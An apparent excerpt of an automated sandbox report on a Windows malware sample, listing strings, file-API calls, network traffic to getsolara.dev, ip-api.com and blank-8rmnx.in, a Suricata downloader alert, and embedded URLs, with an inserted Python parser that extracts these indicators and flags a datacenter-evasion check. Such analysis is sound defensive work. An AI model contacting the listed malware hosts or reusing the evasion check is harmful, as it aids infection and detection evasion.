Source: Binary string: System.Runtime.Serialization.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498719679.00007FF8E8371000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: System.Numerics.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\libssl-3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: System.ni.pdb source: WER40B.tmp.dmp.29.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmp
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7EAD083C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD09280 FindFirstFileExW,FindClose,0_2_00007FF7EAD09280
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD21874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EAD21874
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD09280 FindFirstFileExW,FindClose,2_2_00007FF7EAD09280
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7EAD083C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD21874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7EAD21874
Source: global traffic | HTTP traffic detected: GET /asset/discord.json HTTP/1.1 | Host: getsolara.dev | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api/endpoint.json HTTP/1.1 | Host: getsolara.dev
Source: global traffic | HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1 | Host: clientsettings.roblox.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1 | Host: www.nodejs.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 172.67.203.125
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49785 -> 172.67.203.125:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Code function: 2_2_00007FF8E813660C recv
Source: global traffic | HTTP traffic detected: GET /asset/discord.json HTTP/1.1 | Host: getsolara.dev | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api/endpoint.json HTTP/1.1 | Host: getsolara.dev
Source: global traffic | HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1 | Host: clientsettings.roblox.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1 | Host: www.nodejs.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Accept-Encoding: identity | User-Agent: python-urllib3/2.2.3
Source: global traffic | DNS traffic detected: DNS query: blank-8rmnx.in
Source: global traffic | DNS traffic detected: DNS query: getsolara.dev
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: clientsettings.roblox.com
Source: global traffic | DNS traffic detected: DNS query: www.nodejs.org
Source: global traffic | DNS traffic detected: DNS query: nodejs.org
Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
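Added example, not part of the Joe Sandbox report and not code from Blank Grabber: a Python parser for the network evidence lines above. It collects the indicators an analyst would lift from this section (HTTP hosts and paths, user agents, DNS names, IP addresses, JA3, Suricata alerts, UDP peers with no preceding DNS query) and flags the ip-api.com hosting lookup, which is the request behind the report's "Check if machine is in data center or colocation facility" signature. The sample input is constructed from this section, mostly in the fused form that text extraction gives these tables; the parser also accepts the same cells separated by " | ". The regexes assume lowercase hostnames and 32-hex-digit JA3 values as the report prints them, and every function and field name is mine.

```python
"""Collect network IOCs from Joe Sandbox 'Source:' evidence lines.

Added example; not part of the report. Field and function names are mine.
Assumes the report's layout: hostnames lowercase, and table cells either
fused ("...HTTP/1.1Host: getsolara.devConnection: Keep-Alive") or
separated by " | ".
"""
import re
from dataclasses import dataclass, field

# Constructed sample: evidence lines taken from this section of the report,
# most in the fused form text extraction produces, one in separated form.
SAMPLE_LINES = [
    "Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev",
    "Source: global traffic | HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1 | Host: clientsettings.roblox.com | Connection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive",
    "Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3",
    "Source: Joe Sandbox ViewIP Address: 172.67.203.125 172.67.203.125",
    "Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e",
    "Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49785 -> 172.67.203.125:443",
    "Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1",
    "Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1",
    "Source: unknownDNS query: name: ip-api.com",
    "Source: global trafficDNS traffic detected: DNS query: blank-8rmnx.in",
    "Source: global trafficDNS traffic detected: DNS query: ip-api.com",
]

SEP = r"[\s|]*"  # nothing, whitespace, or " | " between table cells

# A fused header name ("...devConnection:") starts with a capital letter, so a
# lowercase-only hostname class ends the host match in the right place.
RE_HTTP = re.compile(r"HTTP traffic detected: (\w+) (\S+) HTTP/1\.[01]" + SEP + r"Host: ([a-z0-9.-]+)")
RE_UA = re.compile(r"User-Agent: (.+?)" + SEP + r"$")
RE_UDP = re.compile(r"UDP traffic detected without corresponding DNS query: (\S+)")
RE_DNS = re.compile(r"DNS query: (?:name: )?([a-z0-9.-]+)" + SEP + r"$")
RE_IP = re.compile(r"IP Address: (\d{1,3}(?:\.\d{1,3}){3})")
RE_JA3 = re.compile(r"JA3 fingerprint: ([0-9a-f]{32})")
RE_IDS = re.compile(r"Suricata IDS: (\d+) - Severity (\d+) - (.+?) : (\S+) -> (\S+)" + SEP + r"$")


@dataclass
class NetworkIOCs:
    http_requests: set = field(default_factory=set)      # (method, host, path)
    user_agents: set = field(default_factory=set)
    dns_names: set = field(default_factory=set)
    ip_addresses: set = field(default_factory=set)
    ja3: set = field(default_factory=set)
    direct_resolvers: set = field(default_factory=set)   # UDP peers with no prior DNS query
    suricata: set = field(default_factory=set)           # (sid, severity, msg, src, dst)

    @property
    def http_hosts(self) -> set:
        return {host for _, host, _ in self.http_requests}


def extract_iocs(lines) -> NetworkIOCs:
    """Classify each evidence line by its signature text and pull the value out."""
    iocs = NetworkIOCs()
    for line in lines:
        if m := RE_HTTP.search(line):
            iocs.http_requests.add((m.group(1), m.group(3), m.group(2)))
            if ua := RE_UA.search(line):
                iocs.user_agents.add(ua.group(1))
        elif m := RE_UDP.search(line):       # checked before RE_DNS: its text also ends in "DNS query: <peer>"
            iocs.direct_resolvers.add(m.group(1))
        elif m := RE_DNS.search(line):
            iocs.dns_names.add(m.group(1))
        elif m := RE_IP.search(line):
            iocs.ip_addresses.add(m.group(1))
        elif m := RE_JA3.search(line):
            iocs.ja3.add(m.group(1))
        elif m := RE_IDS.search(line):
            sid, sev, msg, src, dst = m.groups()
            iocs.suricata.add((int(sid), int(sev), msg, src, dst))
            iocs.ip_addresses.add(dst.rsplit(":", 1)[0])   # alert destination is an IOC too
    return iocs


def flag_evasion(iocs: NetworkIOCs) -> list:
    """Name the behaviours to triage first; the list is sorted for stable output."""
    findings = []
    for method, host, path in iocs.http_requests:
        if host == "ip-api.com" and "hosting" in path:
            findings.append(f"sandbox/datacenter check: {method} {host}{path}")
    for ua in iocs.user_agents:
        if ua.startswith("python-"):
            findings.append(f"Python HTTP client user agent: {ua}")
    for peer in iocs.direct_resolvers:
        findings.append(f"UDP to {peer} with no matching DNS query (hard-coded resolver?)")
    return sorted(findings)


if __name__ == "__main__":
    result = extract_iocs(SAMPLE_LINES)
    for host in sorted(result.http_hosts):
        print("http host:", host)
    for name in sorted(result.dns_names):
        print("dns:", name)
    for finding in flag_evasion(result):
        print("flag:", finding)
```

Run over the whole report rather than the sample, this yields a deduplicated indicator set. Which hosts are the sample's own infrastructure and which are third-party content it pulled down (the Node.js installer, the Roblox client-version endpoint) is an analyst judgement the parser does not make; it only collects.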
Source: bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:6463
Source: bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:6463/rpc?v=1
Source: bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:64632f
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digi
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://clientsettings.roblox.com
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 0000000B.00000002.1527997670.000001E373670000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1610583580.00000254CF160000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000B.00000002.1534955775.000001E373933000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000B.00000002.1534955775.000001E373933000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, 